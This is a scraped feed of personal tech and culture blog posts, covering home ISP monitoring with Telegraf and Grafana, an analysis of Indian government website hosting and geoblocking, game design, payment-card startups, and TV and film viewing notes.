The output is in the Prometheus format, so it can be scraped and ingested by Prometheus’ time-series DB.\nRunning Telegraf#\nWith the above config in place, let’s try running the agent and see what metrics we get. I am using the official Docker image to run the agent with the following command:\ndocker run --name telegraf-agent --restart always -d -p 9283:9283 -v $PWD\u002Ftelegraf.conf:\u002Fetc\u002Ftelegraf\u002Ftelegraf.conf:ro telegraf\nAfter running the above command, you should be able to see the metrics at localhost:9283\u002Fmetrics:\n$ curl localhost:9283\u002Fmetrics | head\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0# HELP dns_query_query_time_ms Telegraf collected metric\n# TYPE dns_query_query_time_ms untyped\ndns_query_query_time_ms{dc=\"floyd\",domain=\"amazon.in\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 124.096472\ndns_query_query_time_ms{dc=\"floyd\",domain=\"google.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 136.793673\ndns_query_query_time_ms{dc=\"floyd\",domain=\"kite.zerodha.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 122.780946\ndns_query_query_time_ms{dc=\"floyd\",domain=\"mrkaran.dev\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 137.915851\ndns_query_query_time_ms{dc=\"floyd\",domain=\"twitter.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 111.097483\nPerfect! Now we’re all set to configure Prometheus to scrape the metrics from this target. In order to do that, you need to add a new Job:\n- job_name: \"ispmonitor\"\n  scrape_interval: 60s\n  static_configs:\n    - targets: [\"100.94.241.54:9283\"] # RPi telegraf Agent\nIn the above config, I am plugging in the Tailscale IP assigned to my RPi, on the port the Telegraf agent is bound to. This is one of the many reasons why Tailscale is so bloody awesome! I can connect different components in my network to each other without setting up any particular firewall rules or exposing ports on a case-by-case basis.\nSidenote: If you haven’t read Tailscale’s amazing NAT Traversal blog post, do yourself a favour and check it out - after you finish reading this one, of course!\nAnyway, coming back to our Prometheus setup, we can see the metrics being ingested:\n\nShow me the graphs#\nNow comes the exciting bit – making pretty graphs. First, let’s discuss the most important data I can extract out of the Ping and DNS plugins. These plugins export a decent amount of data, but a good rule of thumb while making dashboards is to optimise the signal-to-noise ratio. We’ll do that by filtering out only the metrics that we care about.\nLet’s check out all the metrics exported by the Ping plugin:\n$ curl localhost:9283\u002Fmetrics | grep ping | grep TYPE\n# TYPE ping_average_response_ms untyped\n# TYPE ping_maximum_response_ms untyped\n# TYPE ping_minimum_response_ms untyped\n# TYPE ping_packets_received untyped\n# TYPE ping_packets_transmitted untyped\n# TYPE ping_percent_packet_loss untyped\n# TYPE ping_result_code untyped\n# TYPE ping_standard_deviation_ms untyped\n# TYPE ping_ttl untyped\nPerfect! 
So, from the above list of metrics, the most important ones for us are:\nping_average_response_ms: Avg RTT for a packet\nping_maximum_response_ms: Max RTT for a packet\nping_percent_packet_loss: % of packets lost on the way\nWith just the above 3 metrics, we can answer questions like:\nIs my ISP suffering an outage?\nIf yes, ping_percent_packet_loss should be unusually higher than normal. This usually happens when the ISP’s routing is borked, which causes packets to be routed in a less optimal way; as a side effect, packet loss becomes one of the key metrics to measure here.\nIs the upstream down?\nIf yes, ping_average_response_ms over a recent window should be higher than over a previous window when things were fine and dandy. This can mean one of 2 things: either your ISP isn’t routing correctly to the said upstream, or the CDN\u002Fregion where your upstream is hosted faced an outage. This is quite a handy metric for me to monitor!\nHow many times have your friends complained “xyz.com isn’t working for me” and when you try to load it, it’s fine from your end? There are a lot of actors at play, but ping is usually the simplest and quickest way to detect whether an issue exists or not. Of course, this doesn’t work for hosts which block ICMP packets altogether. They are not rare either; netflix.com and github.com both block ICMP probes, for example. For my use case, this wasn’t a major issue, as I was still able to probe a decent number of upstreams all over the world.\nWith that out of the way, let’s break the dashboard into different components and see what goes behind them.\nPing Response Panel#\n\nTo plot this, simply choose a Stat visualisation with the query ping_average_response_ms{url=\"$url\"}. Repeat this panel for the variable $url and you should be able to generate a nice row view like this.\nAdditionally, you can choose the Thresholds and the Unit to be displayed in the panel with these options.\n\n\nPing Response Time Graph#\nThe next graph is interesting; it lets me visualise the avg, min and max ping response times, as well as the % packet loss plotted on the Y2 (right Y) axis.\n\nAvailability Panel#\nAn interesting query to calculate uptime (just in the context of whether the upstream is reachable) is:\n100 - avg_over_time(ping_percent_packet_loss[2m])\nSince I scrape metrics at an interval of 1m (in order to not ping too frequently and disrupt my actual browsing experience), in this query I am averaging the data points for the metric ping_percent_packet_loss over a [2m] window.\n
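The same expression can also be evaluated outside Grafana via Prometheus’ HTTP API, which is handy for quick checks from a script. A small sketch (the Prometheus address and the url label value are assumptions from my setup):\nimport requests\n\n# Ask Prometheus to evaluate the availability expression right now.\nPROM_URL = \"http:\u002F\u002Flocalhost:9090\u002Fapi\u002Fv1\u002Fquery\"\nquery = '100 - avg_over_time(ping_percent_packet_loss{url=\"mrkaran.dev\"}[2m])'\n\nresp = requests.get(PROM_URL, params={\"query\": query})\nresp.raise_for_status()\n\nfor series in resp.json()[\"data\"][\"result\"]:\n    # Each instant-vector sample is a [timestamp, value-as-string] pair.\n    print(series[\"metric\"].get(\"url\"), series[\"value\"][1])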
\nDNS Response Time Graph#\nWe can similarly query the DNS response time by visualising the average response time for a DNS query. This might be useful only to people self-hosting their DNS servers.\n\nConclusion#\nSo, with a pretty simple and minimal OSS solution, I was able to set up monitoring for my home network! Over the last few days, whenever my ISP had the slightest bit of trouble, I could correlate it with my metrics! I mean, I still can’t do anything about it, because the response from the ISP’s customer support is “Did you try rebooting your router” – the quintessential solution to all tech problems. Wish we could reboot this entire damn 2020 as well, but one can hope!\nShoot me any questions on my Twitter @mrkaran_ :)\nFin!",[],{"slug":2185,"title":2186,"link":2187,"pubDate":2188,"contentSnippet":2189,"tags":2190,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"goi-cyberspace","Analysing the Indian government cyberspace","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F09\u002F16\u002Fgoi-cyberspace\u002F","2020-09-16T00:00:00.000Z","I recently did some work on analysing the Indian government cyberspace, and thought I should document it somewhere outside of my Twitter1.\nList of GoI websites\nI’d made a list of Indian government websites in Jan 2019:\nI ran @18F \u002Fpulse on Indian Government websites to see how many of them support HTTPS. A quick summary:\nTotal Websites: 14183\nTotal Live Websites: 11710 (82%)\nWebsites with Valid HTTPS: 4753 (40% of all live websites)\nRaw Dataset for now: docs.google.com\u002Fspreadsheets\n— Nemo (@captn3m0) January 15, 2019\n\n\nThe dataset was from 2 sources:\nGoI Directory\ncrt.sh (All certificates ending in .gov.in were used)\nI re-ran the scripts to get an updated list (12842 domains), then tabulated them against the public-suffix2 for each. There is a long tail, and I’ve published the results here. Here are the top public suffixes for Indian government sites:\nPublic Suffix – Domains\nnic.in – 2454\ngov.in – 7259\nin – 528\nac.in – 490\ncom – 568\nco.in – 171\norg.in – 168\nedu.in – 117\norg – 844\nres.in – 134\nnet.in – 12\nnet – 38
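\nFor the curious, the tabulation itself is a few lines of Python. A toy sketch; in practice you’d match against the full list from publicsuffix.org rather than this hardcoded subset:\nfrom collections import Counter\n\n# A tiny subset of the public suffix list, for illustration only.\nSUFFIXES = [\"nic.in\", \"gov.in\", \"ac.in\", \"co.in\", \"org.in\",\n            \"edu.in\", \"res.in\", \"net.in\", \"org\", \"com\", \"net\", \"in\"]\n\ndef public_suffix(domain):\n    # The longest matching suffix wins: aavin.tn.gov.in -> gov.in, not in.\n    matches = [s for s in SUFFIXES if domain == s or domain.endswith(\".\" + s)]\n    return max(matches, key=len) if matches else None\n\ndef tabulate(domains):\n    return Counter(public_suffix(d) for d in domains)\n\nprint(tabulate([\"aavin.tn.gov.in\", \"abnhpm.gov.in\", \"webmail.nic.in\"]))\n# Counter({'gov.in': 2, 'nic.in': 1})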
\nSanskari Proxy\nThis was a long-standing idea on my ideas repo:\nA lot of Indian Government websites are inaccessible on the public internet, because they geo-fence them to within Indian boundaries. The idea is to make an Indian proxy service that specifically works only for the geo-fenced Indian government websites.\nFor example, if uidai.gov.in is inaccessible, hitting uidai.gov.sanskariproxy.in will get you the same result, proxied via our servers.\nSince I’d made an updated list of GoI websites, this seemed easy enough. I realized that setting up uidai.gov.sanskariproxy.in would likely count as impersonation under Indian law, so I did the next best thing: run an actual proxy. Here’s the announcement tweet:\nAre you a security researcher outside India? Do you hate getting geoblocked to Indian government websites?\nWell, I made a proxy for security researchers outside India to access Indian government websites without resorting to shady VPNs.\ncaptn3m0\u002Fsanskari-proxy\n— Nemo (@captn3m0) September 5, 2020\n\n\nProject page is https:\u002F\u002Fgithub.com\u002Fcaptn3m0\u002Fsanskari-proxy, and if you’d like to get access - please reach out.\nCyberspace Ownership\nI’d planned to get a complete list of geoblocked websites next. While I’m progressing on this front, the results have been inconsistent\u002Finaccurate so far. As an intermediate step, I’d made a list of IPs against every domain3, which looked like this:\nDomain – IP Address\naavin.tn.gov.in – 164.100.134.148\nabnhpm.gov.in – 14.143.233.34\nagnii.gov.in – 13.232.216.65\nap.gov.in – 117.254.92.53\naponline.gov.in – 125.16.9.130\nappolice.gov.in – 118.185.110.147\nattendance.gov.in – 164.100.166.114\ncgg.gov.in – 112.133.222.115\nWhile running numerous nmap scans (and failing), I started checking the ASN4 for some of these IPs to see who was hosting each website - especially the ones I found were blocked.\nI stumbled upon a bulk IP-to-ASN service by Cymru, ran all the IPs against it and published the results. 
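\nThe Cymru service speaks a simple bulk whois protocol on port 43: you send “begin”, one IP per line, then “end”. A rough sketch of driving it from Python (error handling omitted):\nimport socket\n\ndef bulk_ip_to_asn(ips):\n    # Team Cymru bulk whois: newline-delimited IPs between begin\u002Fend.\n    query = \"begin\\nverbose\\n\" + \"\\n\".join(ips) + \"\\nend\\n\"\n    with socket.create_connection((\"whois.cymru.com\", 43)) as conn:\n        conn.sendall(query.encode())\n        chunks = []\n        while chunk := conn.recv(4096):\n            chunks.append(chunk)\n    # One pipe-delimited line per IP: AS | IP | BGP Prefix | CC | ... | AS Name\n    return b\"\".join(chunks).decode()\n\nprint(bulk_ip_to_asn([\"164.100.134.148\", \"13.232.216.65\"]))\n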
Here’s the important graph:\n\nAs you might expect, NIC5 has the highest share, with NKN6, BSNL, and CtrlS following at roughly 5% each. There are a few other charts on the Twitter thread, and the raw data is available here with interactive versions of each visualization.\nWhat next?\nI’m working on running and comparing connectivity scans to these IPs to get a better understanding of the geoblocking situation. There are also some issues with the domain list, as it seems to be missing lots of domains - so more corrections are needed.\nTwitter decided to suspend 12 different accounts I had access to recently - I’m starting to get wary of using Twitter for archival now. ↩\nA “public suffix” is one under which Internet users can (or historically could) directly register names. For example - nic.in or github.io. Mozilla manages the list at https:\u002F\u002Fpublicsuffix.org\u002F. ↩\nThere are issues with this approach, since domains do resolve to multiple IPs. But this is okay for the rudimentary analysis I’ve been doing so far. ↩\nAutonomous Systems (ASes) are how the internet is sliced up and managed by different entities. Each AS (usually an ISP) is responsible for routing within its network, while announcing network routes on how it can be reached. ↩\nThe primary government office (under MeitY) that provides infrastructure and support for government IT services. ↩\nNational Knowledge Network is a multi-gigabit research and education network that provides a high speed network backbone for educational institutions in India. ↩",[],{"slug":2192,"title":2193,"link":2194,"pubDate":2195,"contentSnippet":2196,"tags":2197,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"setting-up-whatsapp-telegram-bridge-using-matterbridge-2020","Setting up WhatsApp Telegram Bridge Using Matterbridge 2020","https:\u002F\u002Fibcomputing.com\u002Fsetting-up-whatsapp-telegram-bridge-using-matterbridge-2020\u002F","Fri, 11 Sep 2020 14:12:49 +0000","Two years ago I wrote an article about bridging WhatsApp and Telegram groups together. But that solution isn’t working anymore. So I figured out another … \nThe post Setting up WhatsApp Telegram Bridge Using Matterbridge 2020 appeared first on IB Computing.",[2198,2199,2200],"Android","Telegram","Tutorials",{"slug":2202,"title":2203,"link":2204,"pubDate":2205,"contentSnippet":2206,"tags":2207,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"monopoly-deal","The game breaking Deal Breaker card","https:\u002F\u002Fcaptnemo.in\u002Fmonopoly-deal\u002F","2020-06-24T00:00:00.000Z","I have a presentation I sometimes give about Monopoly being a terrible game1.\nI usually end it by pointing the audience to Monopoly Deal, which I introduce as “the only Monopoly edition you can enjoy”.\nThe advantages are obvious:\nMuch shorter game length.\nNo dice rolls.\nEven if you lose badly on luck, you’ve only lost 15 minutes. While it is better than Monopoly, that isn’t to say it is a well-designed game (6.3 on BoardGameGeek).\nThe one major dent in the otherwise decent game is the “Deal Breaker” card, which breaks the game. I’ve house-ruled the game since forever to keep the card out of the game, since it breaks the most important rule of game design:\nGames should be fun2\nDeal Breaker stops people from doing that. How? Read on.\n\nAside: Monopoly Deal (2-5 players) Basic Rules\nThe objective of the game is to get 3 sets of properties in distinct colors. The first player to 3 sets wins the game. There are some action cards, which let you get money\u002Fproperties from other players. Important action cards, relevant for this post:\n\nThe Deal Breaker card lets you \"steal\" a complete set from another player.\nThe Just Say No card lets you say no to any action that any player takes against you. It is the only way to counter a Deal Breaker card.\nHere's a short 3-minute video if you'd like to learn the complete rules.\n\n\n\n\nA lot of metagaming discussion with friends resulted in the following observations:\nThe Deal Breaker is a very powerful card (it takes you 1\u002F3rd of the way to victory).\nYou can assume the single Deal Breaker card to be worth a complete set.\nThe best use of such a card is to win the game. Using it earlier means giving other players a chance to drag you down from 2->1 set. But if you use it to win the game, the game ends immediately.\nHence, Deal Breaker will always end up being the last card of the game.\nIf you are playing a game with the Deal Breaker card, you’d want to save it till the very end, and win the game with it. The only possible case for not winning is the other player having a “Just Say No” card, and playing it on the Deal Breaker to negate your move.\nErgo, the metagame converges to the following:\nAny game with Deal Breaker will end up having the Deal Breaker as the last turn.\nThe only way to prevent someone else from winning with the Deal Breaker is to play a Just Say No on the Deal Breaker.\nIf you have a Just Say No card, you must save it till the end of the game for the Deal Breaker.\nThere are 2 Deal Breakers, and 3 Just Say Nos in the game. 
However, considering that a single Deal Breaker is enough to win the game, and the chances of you getting a second of either card are fairly small - both the Deal Breaker and Just Say No cards will end up getting hoarded for the endgame.\nWhat this results in is something that breaks the fundamental rule of game design:\nPlayers are disincentivized from playing the Just Say No card.\nAs any Exploding Kittens player can confirm, playing a Just Say No card is one of the coolest moves in the game. It lets you stick it to the player who dares ask you for 8M3 rent. It lets you pretend you’re counting your money, and then pull out a trump card and feel awesome! By disincentivizing players from playing the coolest card in the game, the Deal Breaker card makes things less fun. And that breaks our “rule of fun”.\nIn fact, the mere existence of a Deal Breaker card changes the equation. Note that there may be cases where you lose with a Just Say No card still in hand, because you were hoarding it for the eventual Deal Breaker (which might never come). Someone asks you for 4M rent, and you have to pay up despite having a Just Say No card, because you must save the damn card for when someone steals your set. There are a few rare exceptions, but the Deal Breaker creates too many plays where not playing the Just Say No is indeed the correct move.\nSo here is the more interesting corollary observation:\nThe mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.4\nHence, if you’re playing Monopoly Deal, please house-rule the Deal Breaker card and make it easier for everyone. Two easy ways are:\nRemove the card from the game entirely.\nReduce the power of the card to be the same as a Forced Deal, except let it break a set.\nI have the slides here, but they don’t stand well on their own. ↩\nAny game that eliminates players from the game breaks this rule. Popular examples are Monopoly and Mafia\u002FWerewolf. Also see this amazing post on the biggest mistake that Guillotine makes (The “Callous Guard” card). ↩\nTurns out that there is no Unicode symbol for Monopoly Money. ↩\nWe decided Deal Breaker might make sense in 6+ player games with many more cards, where it might help even the playing field a bit for a losing player (much more likely) instead of helping the almost-winning player score a victory. ↩",[],{"slug":2209,"title":2210,"link":2211,"pubDate":2212,"contentSnippet":2213,"tags":2214,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"one-card-to-rule-them-all","A survey of OneCardToRuleThemAll companies","https:\u002F\u002Fcaptnemo.in\u002Fone-card-to-rule-them-all\u002F","2020-06-22T00:00:00.000Z","A lot of companies have come up with the idea of reducing all your cards into a single piece of plastic. Here’s a summary of all the ones I could find, and their fate.\nBeware: this field is very much a startup graveyard. The only remaining survivor seems to be Curve1, but it’s also the first one that’s attempting this outside of the US.\nThere seem to be a lot of challenges (regulatory, financial, and technical) before such a thing becomes a reality. And there’s Apple\u002FSamsung Pay as well. 
Here’s a summary of all the companies I could find in this space.\nIf I’ve missed any, please let me know, and I’ll add them here.\n\nCurve (2015-)\nCurve allows you to spend from any of your accounts using just one card, clearing the clutter from your wallet and simplifying your finances.\nCurve has raised a total of $74M at a valuation north of $250M, out of which £6M were from a crowdfunding campaign in 2019.\nTheir waitlist is at 800,000+ users.\nCurve faced flak for failing to disclose its usage numbers (\u003C100,000 monthly active users out of a total of 500,000) to crowdfunding investors.\nOnly works with Visa\u002FMasterCard. Used to work with Amex, but Curve has a history of working with, and being blocked by, Amex repeatedly.\nSee this page for some details on how it works.\nCoin (YC W13) (2012-2017)\nCoin raised a total of $15.6M.\nShipped in April 2015.\nAcquired by Fitbit in May 2016.\nShut down by Fitbit in Feb 2017.\nRelated: Google acquired FitBit in Nov 2019.\nPlastc (2014-2017)\nSingle dynamic card with an e-Ink touchscreen. See the obligatory launch video with fancy AR.\nCrowdfunded $9M on pre-orders in October 2014.\nDelayed launch to April 2016, and then again to September 2016.\nShut down and declared bankruptcy in April 2017.\nComplete story via digg.com.\nStratos (2015-2015)\nWas supposed to cost $95\u002Fyear.\nAnnounced May 2015.\nRaised $6.63 million over three rounds of financing.\nRan out of money by December 2015.\nSold to Ciright One to avoid collapse.\nSeems to be dead now.\nSwyp (2014-2017)\nHad a pre-order campaign in 2014.\nRaised $5M from Khosla Ventures in 2017.\nTried to pivot in 2017, failed.\nOffered customers a debit card with an app called Hoot in 2017 as an alternative to refunds. I don’t think the Hoot card ever materialized.\nTilt (Swyp’s payment processor) also ceased operations in 2017, due to unrelated reasons.\nSwyp finally shut down in December 2017.\nFinal (YC W15) (2014-2017)\nFinal was a credit card with a different number for every website. As an independent card, Final doesn’t exactly fit in this list, but it’s a very relevant and loved product.\nAnnounced itself with a snazzy video in mid-2014.\nRaised $4M and launched in August 2016, but remained invite-only till the very end.\nFinal’s blog has some interesting content: A Request for Credit Cards program to build card-issuance backed businesses and the Payment card landscape for 2017.\nShut down in December 2017 and acquired by Goldman Sachs in an acqui-hire.\nIndian Landscape\nIndia hasn’t seen a true single-card app yet, but there have been lots of related attempts:\nInfino promised a single card. It had a public roadmap, but never launched, and ultimately pivoted to a coupon aggregator called Meet Donut, which shut down.\nIndusInd Bank has tried a dual-chip debit+credit card. Union Bank has a similar card.\nIndusInd has also tried an interactive credit card with 3 buttons.\nFamPay, Fold, Niyo, OneCard, Donut🪦, vCard🪦, Slice 2 and lots of other startups are doing co-branded issuance, but that’s not the same thing.\nWith the emergence of UPI and the low penetration rate of credit cards, I don’t see a market in India - but I’d love to be proven wrong.\nDid I miss anything? Reach out and let me know.\nThanks to Harman for reviewing drafts of this, and PRL for getting me interested enough to document this.\nCurve used to live on imaginecurve.com, then switched to curve.app and now to curve.com, which must have cost them millions. 
↩\nUnlike others on the list, vCard is entirely a virtual card, and supports UPI transfers from your credit limit. ↩",[],{"slug":2216,"title":2217,"link":2218,"pubDate":2219,"contentSnippet":2220,"tags":2221,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"his-dark-materials","His Dark Materials Season 1 Readthrough","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F06\u002F07\u002Fhis-dark-materials\u002F","2020-06-07T00:00:00.000Z","A long time ago, I tried to do a readthrough for Game of Thrones (Book 1) alongside the first season. I managed to reach Episode 5 before I sped through the rest of the book, but I tried.\nI’m trying something similar for His Dark Materials, which is a great series if you’re looking to watch something new. Instead of noting down Chapter\u002FBook equivalence (like I tried last time), I’m going to write down my thoughts here as I read along. Spoiler warning for the entire first season, obviously.\nOverall\nThe show is very tightly knit with the book, with a few over-arching changes from the story-telling perspective:\nYou get to see points-of-view other than just Lyra’s. This helps establish what else is happening, especially in the other worlds.\nA lot of infodumps are prevented, or better, broken down into multiple sessions.\nThe major change from the first book is of course showing Will’s PoV and our earth.\nChapter 1\nThe opening scene with the great flood sets some context, but isn’t in the books.\nThe Master\u002FButler chat on the wine poisoning happens much later in the books.\nThere is a lot of foreshadowing around Lyra’s parentage in the first 2 chapters that is entirely missed in the show.\nChapter 2\nThe entire Grumman’s-skull-and-hunt sub-plot hasn’t shown up in the book so far (presumably because we only see Lyra’s PoV).\nThe party scene is very well handled (with all the subtle changes for the better). Superb acting as well :)\nThe hiding-Lyra-in-the-boat scene is merely given a passing mention in the book, but is so well done in the show.\nChapter 3\nSplitting Lyra’s parentage reveal (Coulter reveals her father) is a smart move in the show.\nThe show changes Lyra’s kidnappers from Turkish slavers to Gobblers.\nThe Alethiometer reveal happens with both Father Coram and John Fa in the book. The section also has a huge infodump, especially since it involves the parentage reveal. The show breaks it into 3: the alethiometer reveal with Father Coram, a previous interrogation of Lyra with John Fa, and Lyra’s parentage reveal (mother) with Ma Costa.\nChapter 4\nThe one notable “not-in-the-book” scene is Coulter’s meeting with Iofur.\nChapter 5\nInteresting to note that the characters of Billy and Roger are fused in both the film and the TV adaptations.\nChapter 6\nLyra starts a fire in the books, but the show makes it more dramatic by destroying the machine.\nThe balloon ride covers a lot more in the books.\nLearnings\nOverall, the show has been nicely adapted so far, and I think there are a few reasons:\nThe show barely messes with Lyra’s timeline. It’s important to ensure this to avoid creating cascading issues down the path.\nThe majority of the changes are made either on kill-able subplots, or on side-plots that show us what’s going on elsewhere.\nAnd finally, the show spends time where the medium works best. 
The scaring scene in Chapter 2, for example.\nI’m still sad that the ghosts in the crypt don’t get to be seen, though.",[],{"slug":2223,"title":2224,"link":2225,"pubDate":2226,"contentSnippet":2227,"tags":2228,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"starwars-beskar-viewing-order","Star Wars Beskar Viewing Order","https:\u002F\u002Fcaptnemo.in\u002Fstarwars-beskar-viewing-order\u002F","2020-05-04T00:00:00.000Z","I tweeted out my recommended viewing order for Star Wars recently1:\nHappy #StarWarsDay folks. If you've somehow managed to avoid watching Star Wars, here's my recommended viewing order (No Spoilers, 1\u002Fn) pic.twitter.com\u002FK70O4ydCB7\n— Nemo (@captn3m0) May 4, 2020\n\n\nThought I should expand a bit on the what and why. Spoilers towards the end (marked). I also went ahead and named it:\nThe Beskar Order\nRogue One: A Star Wars Story\nStar Wars: Episode IV - A New Hope\nStar Wars: Episode V - The Empire Strikes Back\nStar Wars: Episode VI - Return of the Jedi\nThe Mandalorian (S01E01-04)\nStar Wars: Episode VII - The Force Awakens\nThe Mandalorian (S01E05-08)\nIf you’ve enjoyed the above, you should pick one of the following 2 next:\nIf you liked the core Skywalker Saga (Episodes IV-VI), and want to explore Anakin’s origins - go and watch the prequel trilogy (Episodes I, II, III).\nIf you liked The Force Awakens, you should go finish the sequels (Episodes VIII and IX).\nIn either case, I want to leave this as a choice to the viewer. The prequel trilogy has a lot of flaws. The Machete order famously drops an entire film, and it wasn’t even trying to make room. Go to the prequels if you want to explore the lore. On the flip side, if you liked how Disney handled Episode VII, and want to see closing arcs for the major characters, try the sequels. I wouldn’t recommend interleaving them - it doesn’t get you much and makes things confusing.\nIf you’re still here after finishing both of these (that makes for a total of 10 films and 1 season of telly) - you ought to explore for yourselves. Here are suggestions depending on what you’d like:\nClone Wars (TV Series, 7 seasons)\n  for exploring the franchise at a less grand scale. There’s an Essential viewing order, which covers all the major arcs and best episodes.\n  The Mandalorian (Season 2, Oct 2020)\n  To find out what happens to Baby Yoda\n  Star Wars: Rebels (TV Series, 4 Seasons)\n  If you want to explore new characters and like something Firefly-esque.\n\n\nThere are boardgames, RPGs, and some really great books in the franchise as well. Pick what you’d like to explore.\nInspiration\nThe classic Machete Order, which does a lot of great things by skipping a film and preserving tension and plot-twists. Also of note are the various fan-edits, of which I’ve only ever tried The Phantom Edit.\nRationale\nI tried to optimize for a few things:\nFun while watching the series. So the good stuff comes first, films are paired etc., and The Mandalorian is intentionally included.\nEasy stoppage. In case you don’t like the series, you should be able to stop midway, and still have seen the important\u002Fbest bits.\nSticking to chronological order in the stuff I picked (as much as possible). Sticking to chronology makes it easier to consume.\nTotal time. I don’t want to prescribe a “complete-viewing-order”, but rather a “starting point”.\n(1) is easy to optimize for. 
(2\u002F3) results in things getting thrown around a bit, and (4) means I leave out stuff that you should pick up for later.\nWhy not include __?\nThis is not meant to be an exhaustive order, and I was optimizing for total time. Important mentions:\nSolo\n  Not really essential viewing.\n  Star Wars: The Clone Wars\n  The film is terrible (5.9 on IMDB), because it wasn’t meant to be one.\n  Star Wars: The Clone Wars TV Series\n  I wanted to stick to the main saga, and it’s just too damn long to recommend casually in any viewing order.\n  Star Wars: Holiday Special\n  I still can’t bring myself to finish it. It isn’t even canon any more (Life Day is).\n  Legends\u002FResistance\n  Again, not essential viewing.\n\n\nFAQ\nWho is this for?\n  Recommended for first-time viewers. If you are doing a rewatch, I recommend following The Beskar Machete order.\n  Have you watched everything Star Wars?\n  I can’t even claim to have watched all 12 films, because I couldn’t finish The Clone Wars (movie). I’m still watching Clone Wars (TV series).\n  Why Beskar?\n  I wanted something that would work well with Machete, for the hybrid order. It also makes a point about The Mandalorian 2 belonging in the order.\n  I don’t have this much time!\n  I’ve tried to optimize for viewing time already. If you wanna trim further - you’ll be left with just the original trilogy (Episodes IV, V, VI). Alternatively, just watch The Mandalorian - it stands very well by itself.\n  Did you backdate this post while publishing?\n  Yes. I wrote it just a few days after May 4th, and thought it would be nice.\n\n\n\n\nMore Rationale (SPOILERS AHEAD)\nSPOILERS FROM HERE ONWARDS FOR ALL 12 FILMS. READ AT YOUR OWN PERIL\nWhy start with Rogue One?\n  \n    \nRogue One is a great film, and I love how well it segues into A New Hope. Watching them both back-to-back makes for a great experience. You have this ragged group that has laid down their lives for just a memory chip - and you get to see that bloom into an entire saga. Finishing the original trilogy from there makes sense. The Machete order strongly recommends against starting with Rogue One, but I’ve tried it and it works.\nWhy not stick with the Machete order as well?\n  The Machete order goes (IV, V, II, III, VI), deciding to leave out Episode I, and wedging Episodes II and III in before you see Return of the Jedi. I was optimizing for time here a bit, and I had to leave the prequels as “for-later” in order to make space for the rest. If you’re doing a rewatch, and aren’t short on time - you can totally follow it. This is what it morphs into:3\n\n    \n      Beskar Machete Order\n      \nRogue One: A Star Wars Story\nStar Wars: Episode IV - A New Hope\nStar Wars: Episode V - The Empire Strikes Back\nStar Wars: Episode II - Attack of the Clones\nStar Wars: Episode III - Revenge of the Sith\nStar Wars: Episode VI - Return of the Jedi\nThe Mandalorian (S01E01-04)\nStar Wars: Episode VII - The Force Awakens\nThe Mandalorian (S01E05-08)\nStar Wars: Episode VIII - The Last Jedi\nStar Wars: Episode IX - The Rise of Skywalker\nWhy add the Mandalorian at all?\n  Because frankly - it is both a piece of art, and the best entry into the Star Wars canon in a long time. It also fits into chronological order just after Return of the Jedi - you see how the New Republic has been incompetent, and the ashes of the Empire. 
You get to experience the power vacuum in the galaxy, which hopefully makes sense before jumping into The Force Awakens and the rise of the First Order.\n  Why jump to Episode VII (The Force Awakens) instead of finishing The Mandalorian?\n  We jump a bit ahead (before finishing The Mandalorian) to The Force Awakens, getting to just the start of Rey’s story. This is the only “chronology break” in the order, but it has no side-effects4. The reason for the jump (as opposed to finishing The Mandalorian first) is to have a switch in pace. While I love The Mandalorian, I think pacing it out makes it better.\n  Why keep Episode VII (The Force Awakens) but not the other sequels?\n  The best and the worst thing about The Force Awakens is that it is very much “Star Wars”. It doesn’t take any risks, sticks to the tropes, and more importantly - it closes mostly as a self-contained film. Yes, there are a few plot-hooks (Rey’s parentage, Luke, Finn’s coma), but given how badly they are resolved in the following films - it seems Disney didn’t have any better idea of the answers than the viewers. It also gives you a “tasting experience” of the sequels. The sequels have always been polarizing, and watching it gives you a better heading to make the choice b\u002Fw Prequels\u002FSequels later on in the order.\n\n\nWe close with The Mandalorian finale. The Mandalorian isn’t, strictly speaking, essential viewing. While there are hooks, it doesn’t really change anything of consequence to the main saga (at least not in Season 1). But frankly, it is so well made - you deserve to enjoy it. Just look at the trailer:\n\n\nIf you have feedback, send me a tweet. If you’re reading this in the future, note that this was written in May 2020 and could not include media yet to be published.\nHappy Star Wars Day! ↩\nBeskar is the Star Wars universe’s Vibranium, and features majorly in The Mandalorian as a minor plot device. ↩\nThe arguments against starting with Rogue One don’t even apply to rewatches, so we ignore the Machete Guideline to keep it to the end. ↩\nIn other words, watching The Force Awakens can’t alter the experience of watching the last few episodes of The Mandalorian season 1. ↩",[],{"slug":2230,"title":2231,"link":2232,"pubDate":2233,"contentSnippet":2234,"tags":2235,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-updates","Using Tailscale for home server","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-updates\u002F","2020-04-23T02:40:55.000Z","For those of you who are new to my blog, I had written about my home server setup (hydra) a few months back. Since then I’ve tweaked the setup a bit and made some changes to how I organise\u002Fdeploy applications inside my cluster. I’ll be talking about the updates made so far and the reasons behind them.\nA brief overview of what has changed from hydra v0.1 to hydra v0.2:\nReplaced Wireguard with Tailscale\nAdded a new worker node (residing in DigitalOcean, Bengaluru) to the existing RPi k3s cluster.\nShifted 